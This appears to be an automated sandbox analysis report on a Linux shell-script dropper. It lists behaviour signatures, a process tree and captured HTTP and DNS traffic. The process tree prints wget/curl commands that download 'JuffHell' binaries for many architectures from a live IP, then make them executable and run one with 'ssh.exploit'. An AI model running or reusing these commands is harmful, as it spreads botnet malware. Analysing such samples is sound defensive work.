55e90e18b443a15116c1102dd21397fd1c7dd1e9aff347e1267c27032e3e4bb3

Analysis

max time kernel
39s
max time network
41s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
14/10/2024, 14:51 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
Size

3KB
MD5

4de883db50a87d2eaf32038a6f48a3cf
SHA1

5d786ee84056677315f5eb9315f7a40d7fe8cb94
SHA256

30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55
SHA512

36bee2e2e6850fd3fb99fe832fb3de0f4792ac2b6fc7dc24987f4efb53ab8e747e6ace4d518ac3e2efa62cf997e787be7107b28a2cf305b0f7d13bbace13631d

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
849	chmod
854	chmod
859	chmod
864	chmod
844	chmod
736	chmod
743	chmod
791	chmod
804	chmod
826	chmod
836	chmod
869	chmod
730	chmod

Executes dropped EXE 13 IoCs

ioc	pid	Process
/tmp/dayum0x1a5sfd15as1fa	731	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	737	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	744	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	792	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	805	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	828	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	837	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	845	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	850	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	855	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	860	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	865	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	870	dayum0x1a5sfd15as1fa

Reads runtime system information 13 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
732	wget
734	curl
735	cat

Writes file to tmp directory 14 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/JuffHell.i686	curl
File opened for modification	/tmp/JuffHell.ppc	curl
File opened for modification	/tmp/JuffHell.m68k	curl
File opened for modification	/tmp/JuffHell.spc	curl
File opened for modification	/tmp/JuffHell.arm7	curl
File opened for modification	/tmp/JuffHell.sh4	curl
File opened for modification	/tmp/dayum0x1a5sfd15as1fa	30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
File opened for modification	/tmp/JuffHell.mips	curl
File opened for modification	/tmp/JuffHell.arm	curl
File opened for modification	/tmp/JuffHell.arm6	curl
File opened for modification	/tmp/JuffHell.arc	curl
File opened for modification	/tmp/JuffHell.x86	curl
File opened for modification	/tmp/JuffHell.mpsl	curl
File opened for modification	/tmp/JuffHell.arm5	curl

/tmp/30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
/tmp/30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
1⤵
- Writes file to tmp directory
PID:700
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.x86
  2⤵
  PID:708
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:722
- /bin/cat
  cat JuffHell.x86
  2⤵
  PID:729
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.x86 systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-Dry9w2
  2⤵
  - File and Directory Permissions Modification
  PID:730
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:731
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.mips
  2⤵
  - System Network Configuration Discovery
  PID:732
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:734
- /bin/cat
  cat JuffHell.mips
  2⤵
  - System Network Configuration Discovery
  PID:735
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.mips JuffHell.x86 systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-Dry9w2
  2⤵
  - File and Directory Permissions Modification
  PID:736
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:737
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.mpsl
  2⤵
  PID:738
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:739
- /bin/cat
  cat JuffHell.mpsl
  2⤵
  PID:742
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-Dry9w2
  2⤵
  - File and Directory Permissions Modification
  PID:743
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:744
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.arm
  2⤵
  PID:747
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.arm
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:789
- /bin/cat
  cat JuffHell.arm
  2⤵
  PID:790
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-Dry9w2
  2⤵
  - File and Directory Permissions Modification
  PID:791
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:792
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.arm5
  2⤵
  PID:793
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:798
- /bin/cat
  cat JuffHell.arm5
  2⤵
  PID:803
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-Dry9w2
  2⤵
  - File and Directory Permissions Modification
  PID:804
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:805
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.arm6
  2⤵
  PID:808
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.arm6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:817
- /bin/cat
  cat JuffHell.arm6
  2⤵
  PID:825
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-Dry9w2
  2⤵
  - File and Directory Permissions Modification
  PID:826
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:828
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.arm7
  2⤵
  PID:829
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.arm7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:834
- /bin/cat
  cat JuffHell.arm7
  2⤵
  PID:835
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-Dry9w2
  2⤵
  - File and Directory Permissions Modification
  PID:836
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:837
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.ppc
  2⤵
  PID:838
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.ppc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:842
- /bin/cat
  cat JuffHell.ppc
  2⤵
  PID:843
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.x86
  2⤵
  - File and Directory Permissions Modification
  PID:844
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:845
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.m68k
  2⤵
  PID:846
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.m68k
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:847
- /bin/cat
  cat JuffHell.m68k
  2⤵
  PID:848
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.x86
  2⤵
  - File and Directory Permissions Modification
  PID:849
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:850
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.spc
  2⤵
  PID:851
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.spc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:852
- /bin/cat
  cat JuffHell.spc
  2⤵
  PID:853
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.spc JuffHell.x86
  2⤵
  - File and Directory Permissions Modification
  PID:854
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:855
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.i686
  2⤵
  PID:856
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.i686
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:857
- /bin/cat
  cat JuffHell.i686
  2⤵
  PID:858
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.spc JuffHell.x86
  2⤵
  - File and Directory Permissions Modification
  PID:859
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:860
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.sh4
  2⤵
  PID:861
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.sh4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:862
- /bin/cat
  cat JuffHell.sh4
  2⤵
  PID:863
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.sh4 JuffHell.spc JuffHell.x86
  2⤵
  - File and Directory Permissions Modification
  PID:864
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:865
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.arc
  2⤵
  PID:866
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.arc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:867
- /bin/cat
  cat JuffHell.arc
  2⤵
  PID:868
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arc JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.sh4 JuffHell.spc JuffHell.x86
  2⤵
  - File and Directory Permissions Modification
  PID:869
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:870

Network

GET

http://194.15.36.34/xxx9/JuffHell.x86

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.x86 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 194.15.36.34
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:51:36 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.x86
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN A

Response

free.grootop.in

IN A

172.67.157.149

free.grootop.in

IN A

104.21.40.233
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN AAAA

Response

free.grootop.in

IN AAAA

2606:4700:3035::ac43:9d95

free.grootop.in

IN AAAA

2606:4700:3030::6815:28e9
GET

http://194.15.36.34/xxx9/JuffHell.x86

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.x86 HTTP/1.1
Host: 194.15.36.34
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:51:37 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.x86
GET

http://194.15.36.34/xxx9/JuffHell.mips

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.mips HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 194.15.36.34
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:51:39 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.mips
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN A

Response

free.grootop.in

IN A

104.21.40.233

free.grootop.in

IN A

172.67.157.149
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN AAAA

Response

free.grootop.in

IN AAAA

2606:4700:3030::6815:28e9

free.grootop.in

IN AAAA

2606:4700:3035::ac43:9d95
GET

http://194.15.36.34/xxx9/JuffHell.mips

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.mips HTTP/1.1
Host: 194.15.36.34
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:51:42 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.mips
GET

http://194.15.36.34/xxx9/JuffHell.mpsl

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.mpsl HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 194.15.36.34
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:51:44 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.mpsl
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN A

Response

free.grootop.in

IN AAAA

2606:4700:3030::6815:28e9

free.grootop.in

IN AAAA

2606:4700:3035::ac43:9d95
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN AAAA

Response

free.grootop.in

IN A

172.67.157.149

free.grootop.in

IN A

104.21.40.233
GET

http://194.15.36.34/xxx9/JuffHell.mpsl

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.mpsl HTTP/1.1
Host: 194.15.36.34
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:51:46 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.mpsl
GET

http://194.15.36.34/xxx9/JuffHell.arm

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.arm HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 194.15.36.34
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:51:48 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.arm
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN A

Response

free.grootop.in

IN A

104.21.40.233

free.grootop.in

IN A

172.67.157.149
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN AAAA

Response

free.grootop.in

IN AAAA

2606:4700:3035::ac43:9d95

free.grootop.in

IN AAAA

2606:4700:3030::6815:28e9
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN A
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN AAAA
GET

http://194.15.36.34/xxx9/JuffHell.arm

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.arm HTTP/1.1
Host: 194.15.36.34
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:51:55 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.arm
GET

http://194.15.36.34/xxx9/JuffHell.arm5

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.arm5 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 194.15.36.34
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:51:57 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.arm5
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN A

Response

free.grootop.in

IN A

104.21.40.233

free.grootop.in

IN A

172.67.157.149
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN AAAA

Response

free.grootop.in

IN AAAA

2606:4700:3035::ac43:9d95

free.grootop.in

IN AAAA

2606:4700:3030::6815:28e9
GET

http://194.15.36.34/xxx9/JuffHell.arm5

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.arm5 HTTP/1.1
Host: 194.15.36.34
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:51:58 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.arm5
GET

http://194.15.36.34/xxx9/JuffHell.arm6

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.arm6 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 194.15.36.34
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:51:59 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.arm6
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN A

Response

free.grootop.in

IN A

172.67.157.149

free.grootop.in

IN A

104.21.40.233
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN AAAA

Response

free.grootop.in

IN AAAA

2606:4700:3035::ac43:9d95

free.grootop.in

IN AAAA

2606:4700:3030::6815:28e9
GET

http://194.15.36.34/xxx9/JuffHell.arm6

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.arm6 HTTP/1.1
Host: 194.15.36.34
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:52:01 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.arm6
GET

http://194.15.36.34/xxx9/JuffHell.arm7

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.arm7 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 194.15.36.34
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:52:02 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.arm7
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN A

Response

free.grootop.in

IN AAAA

2606:4700:3030::6815:28e9

free.grootop.in

IN AAAA

2606:4700:3035::ac43:9d95
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN AAAA

Response

free.grootop.in

IN A

172.67.157.149

free.grootop.in

IN A

104.21.40.233
GET

http://194.15.36.34/xxx9/JuffHell.arm7

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.arm7 HTTP/1.1
Host: 194.15.36.34
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:52:03 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.arm7
GET

http://194.15.36.34/xxx9/JuffHell.ppc

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.ppc HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 194.15.36.34
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:52:04 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.ppc
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN A

Response

free.grootop.in

IN AAAA

2606:4700:3035::ac43:9d95

free.grootop.in

IN AAAA

2606:4700:3030::6815:28e9
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN AAAA

Response

free.grootop.in

IN A

104.21.40.233

free.grootop.in

IN A

172.67.157.149
GET

http://194.15.36.34/xxx9/JuffHell.ppc

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.ppc HTTP/1.1
Host: 194.15.36.34
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:52:05 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.ppc
GET

http://194.15.36.34/xxx9/JuffHell.m68k

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.m68k HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 194.15.36.34
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:52:06 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.m68k
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN A

Response

free.grootop.in

IN A

104.21.40.233

free.grootop.in

IN A

172.67.157.149
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN AAAA

Response

free.grootop.in

IN AAAA

2606:4700:3035::ac43:9d95

free.grootop.in

IN AAAA

2606:4700:3030::6815:28e9
GET

http://194.15.36.34/xxx9/JuffHell.m68k

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.m68k HTTP/1.1
Host: 194.15.36.34
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:52:07 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.m68k
GET

http://194.15.36.34/xxx9/JuffHell.spc

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.spc HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 194.15.36.34
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:52:07 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.spc
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN A

Response

free.grootop.in

IN A

172.67.157.149

free.grootop.in

IN A

104.21.40.233
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN AAAA

Response

free.grootop.in

IN AAAA

2606:4700:3030::6815:28e9

free.grootop.in

IN AAAA

2606:4700:3035::ac43:9d95
GET

http://194.15.36.34/xxx9/JuffHell.spc

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.spc HTTP/1.1
Host: 194.15.36.34
User-Agent: curl/7.52.1
Accept: */*

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:52:08 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.spc
GET

http://194.15.36.34/xxx9/JuffHell.i686

Remote address:

194.15.36.34:80

Request

GET /xxx9/JuffHell.i686 HTTP/1.1
User-Agent: Wget/1.18 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 194.15.36.34
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 14 Oct 2024 14:52:09 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: https://free.grootop.in/xxx9/JuffHell.i686
DNS

free.grootop.in

Remote address:

1.1.1.1:53

Request

free.grootop.in

IN A

Response

free.grootop.in

IN A

104.21.40.233

free.grootop.in

IN A

172.67.157.149
DNS

free.grootop.in

Remote address:

